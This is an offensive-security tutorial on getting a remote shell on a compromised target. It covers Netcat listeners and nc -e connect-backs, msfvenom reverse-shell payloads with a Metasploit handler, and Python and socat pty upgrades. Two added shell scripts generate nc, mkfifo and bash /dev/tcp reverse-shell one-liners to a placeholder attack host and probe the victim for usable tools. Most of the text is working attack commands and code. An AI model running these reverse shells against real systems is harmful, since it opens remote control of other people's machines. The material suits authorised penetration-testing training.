Getting a Remote Shell
Let’s assume you’ve found some way to run code on your target, ideally an upload vulnerability that lets you place a web shell or a reverse-shell script on the box. In the examples below the attack box is 192.168.0.10 and the listener port is 1234.
Netcat
Start a Netcat listener on the attack box:
nc -lvnp 1234
… then, on the victim, connect back with a shell attached, provided the victim’s Netcat is a version that supports -e (netcat-traditional and ncat do; the OpenBSD nc shipped on many distributions does not):
nc -e /bin/sh 192.168.0.10 1234
That gets you a shell. If -e works you can pass /bin/bash instead of /bin/sh for a Bash shell, but either way it has no pty until you upgrade it (see the Python section below).
Shellcode Resources
You can find all kinds of cool reverse shell code at Pentest Monkey:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
See these detailed instructions for a PHP reverse shell, which also walk through setting up the listener:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
And if you need to start with a web shell the Monkey has them here:
http://pentestmonkey.net/category/tools/web-shells
Msfvenom
But since we’re in Metasploit, it’s handy to use Metasploit’s msfvenom to generate the commands for us. Metasploit has several payloads under “cmd/unix” that generate one-liner bind or reverse shells; on a default install they live at /usr/share/metasploit-framework/modules/payloads/singles/cmd/unix. There are Windows payloads (and even mainframe ones) as well.
What limits you is usually what’s installed on the target, so pick the payload that matches the interpreters and binaries it has.
For instance, this payload builds a Netcat reverse shell around a named pipe, so it works when the victim’s Netcat has no -e flag:
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.0.10 LPORT=1234 -f raw
And here’s a Perl one-liner to use if Netcat isn’t installed at all:
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.10 LPORT=1234 -f raw
For any msfvenom reverse payload you’ll need a matching handler on the attack box, with the same payload name, LHOST and LPORT you gave msfvenom:
msf > use exploit/multi/handler
msf > set PAYLOAD <Payload name>
msf > set LHOST <LHOST value>
msf > set LPORT <LPORT value>
msf > set ExitOnSession false
msf > exploit -j -z
The exploit -j -z line starts the handler as a background job that keeps listening after the first session. If you save those commands in a resource script instead, start the handler from the OS shell (not from the msf prompt) with:
msfconsole -r <resource file>
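The Netcat and msfvenom sections above both come down to the same question: which reverse-shell one-liner can the target actually run? The script below is an added example, not code from the original page or from Metasploit. It validates LHOST/LPORT before building anything (a typo there is pasted straight into a shell on the target), generates the one-liner for three techniques (Netcat with -e, Netcat without -e via a named pipe, which is the same trick cmd/unix/reverse_netcat uses, and Bash’s /dev/tcp), and includes a heuristic probe meant to be run on the target to pick between them. The 192.168.0.10:1234 pair is the page’s placeholder listener address.

```shell
#!/bin/sh
# Added example, not from the original page or from Metasploit: build the
# victim-side reverse-shell one-liner from what the target has installed, and
# refuse to build it from a malformed LHOST/LPORT. 192.168.0.10:1234 is the
# placeholder listener address used throughout the page.

# Dotted-quad IPv4 check: shape first, then each octet <= 255.
valid_lhost() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for octet in $(echo "$1" | tr '.' ' '); do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# TCP port check: digits only and within 1..65535.
valid_lport() {
    echo "$1" | grep -Eq '^[0-9]{1,5}$' || return 1
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the one-liner to run on the target for a given technique:
#   nc-e     netcat built with -e (netcat-traditional, ncat)
#   nc-fifo  netcat without -e: a named pipe carries the shell's I/O instead
#            (the same trick msfvenom's cmd/unix/reverse_netcat relies on)
#   bash     bash's /dev/tcp pseudo-device, no netcat needed at all
gen_reverse_shell() {
    tech=$1; lhost=$2; lport=$3
    valid_lhost "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_lport "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    case "$tech" in
        nc-e)    echo "nc -e /bin/sh $lhost $lport" ;;
        nc-fifo) echo "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc $lhost $lport > /tmp/f" ;;
        bash)    echo "bash -i >& /dev/tcp/$lhost/$lport 0>&1" ;;
        *)       echo "unknown technique: $tech" >&2; return 1 ;;
    esac
}

# Heuristic probe meant to be run ON THE TARGET (through a web shell, say):
# prints the first technique the box can support. -e support is inferred from
# nc's usage text, which separates netcat-traditional/ncat from OpenBSD nc.
probe_target() {
    if command -v nc >/dev/null 2>&1; then
        if nc -h 2>&1 | grep -Eq -- '-e[, ]'; then echo nc-e; else echo nc-fifo; fi
    elif command -v bash >/dev/null 2>&1; then
        echo bash
    else
        echo none
    fi
}

# Attack-box listener to pair with whichever one-liner you end up using.
listener_cmd() {
    valid_lport "$1" || return 1
    echo "nc -lvnp $1"
}

# Demo with the placeholder address: print every variant so you can paste
# the one that matches what probe_target reported from the victim.
for t in nc-e nc-fifo bash; do
    printf '%-8s %s\n' "$t:" "$(gen_reverse_shell "$t" 192.168.0.10 1234)"
done
echo "listener: $(listener_cmd 1234)"
```

Run the probe on the target first (paste the probe_target function into a web shell, or just test the same things by hand), then generate the matching one-liner on the attack box and start the listener before pasting it.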
Spawn a Bash Shell from Python
This Python one-liner gets you a real pty once you’ve got a reverse shell open. First, on the attack box, note the values you’ll need at the end:
echo $TERM   # the terminal type to export on the victim
stty size    # prints "rows columns" for your current window
Then, in the reverse shell:
python -c 'import pty; pty.spawn("/bin/bash")'   # use python3 if python is absent
CTRL-Z   # suspends the shell and drops you back to the attack box
stty raw -echo; fg   # raw mode so Ctrl-C and tab completion reach the victim, then resume the shell
reset
export SHELL=bash
export TERM=xterm-256color   # whatever echo $TERM showed (note the spelling: the hyphen goes before 256)
stty rows 38 columns 116   # the numbers stty size showed
— Above from this very nice tutorial:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/.
Also look at the socat alternative on that page, which gives you a proper pty end to end without the stty juggling.
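An attack-box helper for the upgrade procedure above, as an added example that is not from the original page or the ropnop tutorial. The rows, columns and TERM pasted into the victim shell have to describe the terminal you are sitting in on the attack box, so the script reads them locally (falling back to 24x80 when there is no tty, for instance when run from a script), prints the exact lines to paste, and also prints the socat listener/connect pair as the alternative route. The 192.168.0.10:1234 listener address is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original page or the ropnop tutorial: run this
# on the ATTACK BOX before upgrading a dumb reverse shell. It reads the local
# terminal size and TERM, falls back to 24x80 when stdin is not a tty, and
# prints the lines to paste into the victim shell. 192.168.0.10:1234 is a
# placeholder listener address.

# "rows cols" of the local terminal, or "24 80" when there is no usable tty
# (also covers pseudo-terminals that report a 0x0 window).
local_tty_size() {
    size=$( { stty size </dev/tty; } 2>/dev/null || true )
    set -- $size
    if [ "$1" -gt 0 ] 2>/dev/null && [ "$2" -gt 0 ] 2>/dev/null; then
        echo "$1 $2"
    else
        echo "24 80"
    fi
}

# Local TERM, defaulting to xterm-256color (the hyphen goes before 256;
# "xterm256-color" is not a terminfo entry and reset/clear will complain).
local_term() {
    echo "${TERM:-xterm-256color}"
}

# The commands to type in the victim shell after Ctrl-Z / stty raw -echo / fg.
pty_fixup_cmds() {
    rows=$1; cols=$2; term=$3
    echo "reset"
    echo "export SHELL=bash"
    echo "export TERM=$term"
    echo "stty rows $rows columns $cols"
}

# The whole Python route, in order, with the local values filled in.
python_upgrade_steps() {
    set -- $(local_tty_size)
    echo "# in the victim shell:"
    echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'   # or python3"
    echo "# press Ctrl-Z, then in the attack-box shell:"
    echo "stty raw -echo; fg"
    echo "# back in the victim shell:"
    pty_fixup_cmds "$1" "$2" "$(local_term)"
}

# socat alternative: a real pty end to end. Listener first (attack box),
# then the connect-back command for the victim; both need socat installed.
socat_pair() {
    lhost=$1; lport=$2
    echo "socat file:\$(tty),raw,echo=0 tcp-listen:$lport"
    echo "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$lhost:$lport"
}

python_upgrade_steps
echo
socat_pair 192.168.0.10 1234
```

Resize your terminal before running it, not after: the victim side only learns the window size from the stty line you paste, so a later resize on the attack box needs the line pasted again.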
For succinct example code for several platforms, see this great cheatsheet/page:
https://netsec.ws/?p=331
And as always check out OffSec’s own page:
https://www.offensive-security.com/metasploit-unleashed/msfvenom/